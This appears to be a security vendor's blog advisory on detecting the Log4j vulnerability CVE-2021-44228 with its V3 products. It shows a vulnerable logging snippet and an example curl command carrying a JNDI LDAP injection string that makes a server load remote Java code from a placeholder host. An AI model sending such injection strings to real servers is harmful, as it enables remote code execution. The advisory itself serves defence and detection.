Detection of Log4j Vulnerability (CVE-2021-44228) Using V3 Network Detection

After the reveal of Apache Log4j vulnerability (CVE-2021-44228) on December 10th, 2021, there have been various POCs (Proof of Concept) uploaded on GitHub. The Log4j vulnerability has a huge impact because attackers can insert malicious class addresses and run malicious classes created by them on web servers.

AhnLab has updated its network blocking signature to detect Log4j vulnerability attacks. Explanation of the vulnerability and a video of V3 detecting vulnerability is shown below.

1. Affected Products and Versions

The products that fall under the following condition are affected by the vulnerability.

  • Apache Log4j 2.0-beta9 to 2.12.1 and 2.13.0 to 2.15.0 version
  • All versions of Apache Log4j 1.2.x

2. Vulnerability Exploitation Techniques

If a service using Log4j includes a code that records strings sent to the user-agent as logs, the following exploitations can occur.

[Part of server source code]

static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.<em>class</em>.getName());
...
String userAgent = he.getRequestHeader("user-agent");    
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...

[Vulnerability Exploitation]

An attack that automatically executes the Java object located in xxx.xxx.xxx.xxx/a from the server
ex) # curl 127.0.0.1:8080 -H “X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}”

3. AhnLab Products Response

Currently, V3, TG/IPX, AIPS, and HIPS products can detect the vulnerability. However, as V3 products can only detect attacks when the Network Intrusion Prevention option is enabled, it is recommended for the users to use the option to prevent log4j vulnerability attacks.

Figure 1. Enabling Network Intrusion Prevention feature

  • Apache_Log4j_JndiManager_JNDI_Injection-1(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-2(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-3(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-4(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-5(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-6(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-7(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
  • Apache_Log4j_JndiManager_JNDI_Injection-8(CVE-2021-44228) (V3 Engine Version: 2021.12.22.03)
Figure 2. List of Log4j network detection signatures added in V3 products (for business)

The following video shows how Log4j vulnerability (CVE-2021-44228) is detected and blocked by V3 products (for business) using the network intrusion feature.

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments